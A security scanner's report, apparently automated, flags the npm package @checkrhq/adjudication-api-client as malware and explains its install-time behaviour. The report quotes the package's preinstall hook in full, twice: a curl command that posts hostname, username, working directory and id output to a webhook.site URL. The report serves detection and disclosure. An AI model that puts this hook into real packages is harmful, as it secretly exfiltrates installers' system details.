@checkrhq/adjudication-api-client@0.0.2

This package is for testing only.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

The package executes an install-time shell command that exfiltrates host and user context. The endpoint is a generic webhook collector unrelated to an API client.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install / lifecycle preinstall
Impact
Leaks hostname, username, current directory, and Unix id details from the installer environment.
Mechanism
install-time curl exfiltration of system identity and working directory
Attack narrative
On package installation, npm invokes the preinstall script from package.json. The script runs curl to POST command-substitution output from hostname, whoami, pwd, and id to a webhook.site collector, then hides errors with || true. This is unconsented environment reconnaissance and exfiltration at install time.
Rationale
Read-only source inspection confirmed package.json contains the only executable behavior: an install lifecycle hook that sends installer identity and environment context to an unrelated external webhook. This is concrete malicious install-time data exfiltration, not package-aligned API client behavior.
Evidence
package.json, README.md
Network endpoints: 1
webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines a preinstall lifecycle hook
  • preinstall runs curl during npm install
  • Script posts hostname, whoami, pwd, and id output
  • Data is sent to unrelated webhook.site URL
  • Script suppresses failures with || true
Evidence against
  • Inspected tree contains only README.md and package.json
  • No runtime entrypoint, persistence, destructive action, or AI-agent control-surface writes found
Behavioral surface
Source: No risky source behavior triggered.
Supply chain: No supply-chain packaging signals triggered.
Manifest: No manifest risk signals triggered.
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged
package.json
scripts.preinstall = curl -s --max-time 5 https://webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999 -d "h=$(hostname)&u=$(whoami)&d=$(pwd)&id=$(id)" || true
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.json
scripts.preinstall = curl -s --max-time 5 https://webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999 -d "h=$(hostname)&u=$(whoami)&d=$(pwd)&id=$(id)" || true
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.json

Findings

1 High, 1 Medium, 1 Low
High: Install Time Lifecycle Scripts (package.json)
Medium: Ambiguous Install Lifecycle Script (package.json)
Low: Scripts Present